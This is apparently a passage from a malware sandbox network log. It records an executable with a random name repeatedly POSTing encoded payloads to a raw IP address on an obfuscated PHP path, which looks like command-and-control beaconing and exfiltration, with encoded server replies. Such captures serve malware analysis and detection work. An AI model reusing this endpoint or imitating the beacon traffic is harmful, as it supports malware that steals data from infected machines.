Dec 21, 2024 10:02:54.734133959 CET	2536	OUT	Data Raw: 5d 54 43 53 5d 5b 57 57 55 5e 55 5a 54 53 50 5d 57 5b 5c 5e 52 5e 51 58 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: ]TCS][WWU^UZTSP]W[\^R^QXZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#91,%-6!./(X$3.(R4?Z%%7'+.'=5!_.#Q,
Dec 21, 2024 10:02:55.772752047 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:02:55.996344090 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:02:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49808	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:02:56.241302013 CET	380	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2532 Expect: 100-continue
Dec 21, 2024 10:02:56.593498945 CET	2532	OUT	Data Raw: 5d 51 43 5e 5d 57 52 50 55 5e 55 5a 54 5b 50 56 57 5c 5c 5a 52 50 51 5f 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: ]QC^]WRPU^UZT[PVW\\ZRPQ_ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ ,1U2)U?1%\,<<3<'.("?)Y%>T?'$?[8Z>%!_.#Q,
Dec 21, 2024 10:02:57.617976904 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:02:57.852189064 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:02:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49812	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:02:58.084305048 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:02:58.437349081 CET	2536	OUT	Data Raw: 58 51 43 50 58 5c 52 53 55 5e 55 5a 54 5e 50 5d 57 5b 5c 5f 52 50 51 5c 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XQCPX\RSU^UZT^P]W[\_RPQ\ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#91 W1==>W5Z-Y8]$/<U985 \%1"+B$>.<*!_.#Q,2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49818	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:02:59.104954004 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2100 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:02:59.452874899 CET	2100	OUT	Data Raw: 5d 56 43 53 5d 5e 52 53 55 5e 55 5a 54 5b 50 54 57 5a 5c 5f 52 5e 51 56 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: ]VCS]^RSU^UZT[PTWZ\_R^QVZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ -W$R1>=!Z.3','.#,!]&2*P?$_?4X>!_.#Q,"
Dec 21, 2024 10:03:00.482969046 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:00.716202021 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 0e 1e 39 56 23 15 31 52 3c 3a 05 59 3d 01 3a 51 2a 3d 2a 5c 3b 0b 28 02 21 2c 2a 12 3e 13 27 10 24 2d 33 1e 36 2a 03 5c 36 11 3f 5f 29 0b 2e 58 01 1e 21 0b 20 55 21 54 27 3c 3f 55 3d 24 3a 5f 2b 10 2e 59 24 2f 2b 56 31 03 28 58 3c 14 33 0f 25 3d 22 5d 2d 2f 23 5a 3f 3e 0e 57 24 26 2b 51 03 1e 25 04 25 05 3c 0b 24 23 17 13 25 3d 22 00 37 3e 30 0b 29 38 3c 0e 37 5d 26 5a 2f 29 37 07 3f 5b 3a 11 3d 06 2d 00 30 3f 3f 53 26 04 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 989V#1R<:Y=:Q=\;(!,>'$-36\6?_).X! U!T'<?U=$:_+.Y$/+V1(X<3%="]-/#Z?>W$&+Q%%<$#%="7>0)8<7]&Z/)7?[:=-0??S&#T-,H1]V0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49819	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:02:59.225178957 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:02:59.577898979 CET	2536	OUT	Data Raw: 58 50 43 56 58 5a 52 55 55 5e 55 5a 54 5e 50 54 57 5c 5c 55 52 53 51 5d 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XPCVXZRUU^UZT^PTW\\URSQ]ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ D:&>=V*2!]9?$?:864Y9Z%>?$>-++%!_.#Q,2
Dec 21, 2024 10:03:00.603161097 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:00.836214066 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49826	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:01.072997093 CET	380	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue
Dec 21, 2024 10:03:01.421643972 CET	2536	OUT	Data Raw: 58 57 43 56 5d 5e 52 53 55 5e 55 5a 54 5d 50 56 57 58 5c 58 52 54 51 5c 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XWCV]^RSU^UZT]PVWX\XRTQ\ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ ,!<%%)W",,?%/:^:4<*%+$#Z+ Y)!_.#Q,>
Dec 21, 2024 10:03:02.452472925 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:02.684040070 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49832	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:02.936671019 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:03.291254044 CET	2536	OUT	Data Raw: 5d 55 43 51 58 5d 57 52 55 5e 55 5a 54 58 50 50 57 5f 5c 5f 52 54 51 57 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: ]UCQX]WRU^UZTXPPW_\_RTQWZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ E90S&=9U=2:,<$3?(S:^%P4?&&"1(4<>8^)%!_.#Q,*
Dec 21, 2024 10:03:04.310667038 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:04.544081926 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49833	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:04.789721012 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:05.140408993 CET	2536	OUT	Data Raw: 58 54 43 5e 5d 5c 57 56 55 5e 55 5a 54 5f 50 56 57 5f 5c 5d 52 53 51 5d 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XTC^]\WVU^UZT_PVW_\]RSQ]ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#.2#&=9=!%Z./;0?.(!P7?1T-<^+. ^+%!_.#Q,6

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49839	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:05.846609116 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2112 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:06.202867031 CET	2112	OUT	Data Raw: 5d 56 46 52 5d 5d 57 5f 55 5e 55 5a 54 5d 50 57 57 5a 5c 59 52 54 51 5e 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: ]VFR]]W_U^UZT]PWWZ\YRTQ^ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ C: U%-5T=[-<#%<$:;!Q4<5[%"T(78+8_*5!_.#Q,>
Dec 21, 2024 10:03:07.216780901 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:07.456120014 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 0e 1e 39 57 34 2b 25 54 2b 2a 2c 03 2a 01 29 0c 29 3e 0c 5f 38 1c 2b 5f 35 02 2a 58 29 03 3f 5e 33 2d 2b 5c 22 39 2e 04 22 2f 37 59 3e 31 2e 58 01 1e 22 1c 23 30 31 57 25 3c 2f 56 29 37 08 5c 3c 07 3e 10 26 2f 27 1b 25 2a 3c 14 2b 03 2f 08 25 03 3d 02 2d 2c 27 1d 28 3e 34 1d 27 1c 2b 51 03 1e 25 02 26 2f 23 52 24 23 31 13 32 3e 3e 01 22 3d 33 56 3f 38 37 14 21 38 26 5d 3b 5f 2b 06 28 2e 3e 5b 3e 28 08 5e 24 02 2b 1b 25 2e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 989W4+%T+,))>_8+_5X)?^3-+\"9."/7Y>1.X"#01W%</V)7\<>&/'%<+/%=-,'(>4'+Q%&/#R$#12>>"=3V?87!8&];_+(.>[>(^$+%.#T-,H1]V0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49840	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:06.096024990 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:06.452903986 CET	2536	OUT	Data Raw: 5d 56 43 57 5d 5d 52 50 55 5e 55 5a 54 5a 50 50 57 5c 5c 5f 52 54 51 56 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: ]VCW]]RPU^UZTZPPW\\_RTQVZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ -!+1==!%\,?<'?3: 515<#](> ^*5!_.#Q,"
Dec 21, 2024 10:03:07.472363949 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:07.708254099 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49846	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:07.943376064 CET	380	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue
Dec 21, 2024 10:03:08.296780109 CET	2536	OUT	Data Raw: 5d 54 43 54 5d 5a 52 57 55 5e 55 5a 54 5e 50 56 57 5d 5c 5e 52 5e 51 5d 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: ]TCT]ZRWU^UZT^PVW]\^R^Q]ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ C9$%)W=W9,,;'8V-8="?"&!"P$+?4[%!_.#Q,2
Dec 21, 2024 10:03:09.319072962 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:09.553232908 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49852	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:09.786612988 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:10.140436888 CET	2536	OUT	Data Raw: 5d 56 46 53 5d 5f 52 52 55 5e 55 5a 54 5c 50 54 57 5d 5c 58 52 51 51 57 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: ]VFS]_RRU^UZT\PTW]\XRQQWZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#-"#&[9W*"9^./,^$.&#:%!6U('+_?[+)%!_.#Q,
Dec 21, 2024 10:03:11.164343119 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:11.405324936 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49858	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:11.647213936 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:11.999799967 CET	2536	OUT	Data Raw: 58 5e 43 5e 5d 59 52 55 55 5e 55 5a 54 5c 50 57 57 5e 5c 5c 52 52 51 5d 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: X^C^]YRUU^UZT\PWW^\\RRQ]ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ :?%?1^,,$^',;:75\1?<==5!_.#Q,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49859	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:12.589409113 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2112 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:12.937417030 CET	2112	OUT	Data Raw: 5d 51 43 57 5d 5c 57 54 55 5e 55 5a 54 5e 50 54 57 5c 5c 5e 52 5f 51 5e 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: ]QCW]\WTU^UZT^PTW\\^R_Q^ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ 9<R$.!P=9_9/3%?-6 <5%2.W(4+^(,^*%!_.#Q,2
Dec 21, 2024 10:03:13.966227055 CET	25	IN	HTTP/1.1 100 Continue
